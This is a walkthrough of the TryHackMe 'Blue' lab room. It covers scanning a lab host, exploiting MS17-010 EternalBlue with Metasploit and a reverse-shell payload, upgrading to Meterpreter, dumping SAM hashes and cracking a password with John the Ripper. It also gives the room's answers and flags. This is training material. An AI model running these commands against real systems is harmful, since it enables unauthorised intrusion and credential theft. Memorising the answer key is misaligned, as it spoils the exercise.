Room Overview: Blue is a beginner-friendly TryHackMe room focused on Windows exploitation. This room teaches the fundamentals of exploiting the infamous MS17-010 EternalBlue vulnerability using Metasploit, privilege escalation techniques, password hash cracking, and basic post-exploitation activities.
Skills Required: Basic Linux command line knowledge, understanding of Nmap, familiarity with Metasploit framework
Skills Learned: Windows SMB exploitation, Metasploit usage, shell upgrading, privilege escalation, password hash dumping and cracking
Task 1: Reconnaissance
The first step in any penetration test is reconnaissance. We need to identify what services are running on the target machine and discover potential vulnerabilities.
Port Scanning
Let's start by scanning for open ports under 1000:
nmap -p 1-999 10.10.165.91
Question: How many ports are open with a port number under 1000?
Answer: 3
Vulnerability Detection
Port 445 (SMB) is open, which is often vulnerable to various exploits. Let's check if this machine is vulnerable to MS17-010 (EternalBlue):
nmap -p 445 --script=smb-vuln-ms17-010 10.10.165.91
Question: What is this machine vulnerable to?
Answer: ms17-010
What is EternalBlue?
MS17-010, known as EternalBlue, is a critical vulnerability in Microsoft's SMBv1 protocol. Originally developed by the NSA and leaked by the Shadow Brokers in 2017, this exploit allows remote code execution on vulnerable Windows systems. It was famously used in the WannaCry and NotPetya ransomware attacks.
Task 2: Gaining Access
Now that we've confirmed the target is vulnerable to EternalBlue, let's exploit it using Metasploit.
Starting Metasploit
msfconsole
Finding the Exploit
Search for the EternalBlue exploit module:
search ms17_010
Question: What is the full path of the exploitation code?
Answer: exploit/windows/smb/ms17_010_eternalblue
Configuring the Exploit
Select the exploit and view its options:
use exploit/windows/smb/ms17_010_eternalblueshow options
Question: What is the name of the required value we need to set?
Answer: RHOSTS
Configure the exploit with the target IP and payload:
set RHOSTS 10.10.165.91set payload windows/x64/shell/reverse_tcprun
If successful, you'll receive a command shell. Background it with CTRL + Z for the next steps.
Task 3: Privilege Escalation
While we have a shell, we need to upgrade it to a Meterpreter session for better functionality and then ensure we have SYSTEM-level privileges.
Converting Shell to Meterpreter
Question: What post module do we use to convert a shell to Meterpreter?
Answer: post/multi/manage/shell_to_meterpreter
use post/multi/manage/shell_to_meterpretershow options
Question: Which option are we required to change?
Answer: SESSION
Set the session ID (use sessions -l to list active sessions):
set SESSION 1set LHOST [Your AttackBox IP]run
Interacting with Meterpreter
Once the conversion completes, interact with the new Meterpreter session:
sessions -i 2
Verifying System Privileges
Check if we have SYSTEM privileges:
shellwhoami
Exit the shell and return to Meterpreter:
exit
Process Migration
For stability, we should migrate to a more stable process running as SYSTEM:
ps
Look for a process running as NT AUTHORITY\SYSTEM (such as services.exe or lsass.exe). Note its PID and migrate:
migrate [PID]
Note: Process migration can be unstable. If it fails, try a different process or re-exploit the machine.
Task 4: Credential Dumping and Cracking
Now that we have SYSTEM privileges, we can dump password hashes from the SAM database.
Dumping Password Hashes
hashdump
This will output all user password hashes. Look for non-default users.
Question: What is the name of the non-default user?
Answer: Jon
Cracking the Hash with John the Ripper
Copy Jon's hash to a file called hash.txt on your AttackBox:
echo "Jon:[hash_value]" > hash.txtjohn --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Once cracked, view the password:
john --show hash.txt
Question: What is the cracked password?
Answer: alqfna22
Task 5: Flag Hunting
Time to find the three flags hidden on the system. These flags represent key locations in the Windows file system.
Flag 1 - System Root
The first flag is located at the system root:
cd C:\\cat flag1.txt
Answer: flag{access_the_machine}
Flag 2 - Password Storage Location
This flag is found where Windows stores password hashes (the SAM database location):
search -f flag2.txtcd Windows\\System32\\config\\cat flag2.txt
Answer: flag{sam_database_elevated_access}
Errata: Windows sometimes deletes this flag. If you can't find it, you may need to restart the machine and re-exploit.
Flag 3 - Administrator Documents
The final flag is in a location where administrators typically store important documents:
cd Users\\Jon\\Documents\\cat flag3.txt
Answer: flag{admin_documents_can_be_valuable}
Conclusion
Congratulations! You've successfully completed the Blue room. This walkthrough demonstrated several critical penetration testing skills:
- Network reconnaissance with Nmap
- Vulnerability identification using NSE scripts
- Exploiting the infamous EternalBlue vulnerability
- Upgrading shells to Meterpreter for enhanced functionality
- Privilege escalation and process migration
- Credential dumping and password cracking
- Post-exploitation and data exfiltration
The EternalBlue vulnerability, while patched years ago, remains relevant in penetration testing as many legacy systems remain unpatched. Understanding how these exploits work is crucial for both offensive and defensive security professionals.
Next Steps: If you enjoyed this room, check out the sequel rooms "Ice" and "Blaster" on TryHackMe for more Windows exploitation practice.
[ SYSTEM COMPROMISED ] - [ HASHES CRACKED ] - [ FLAGS CAPTURED ]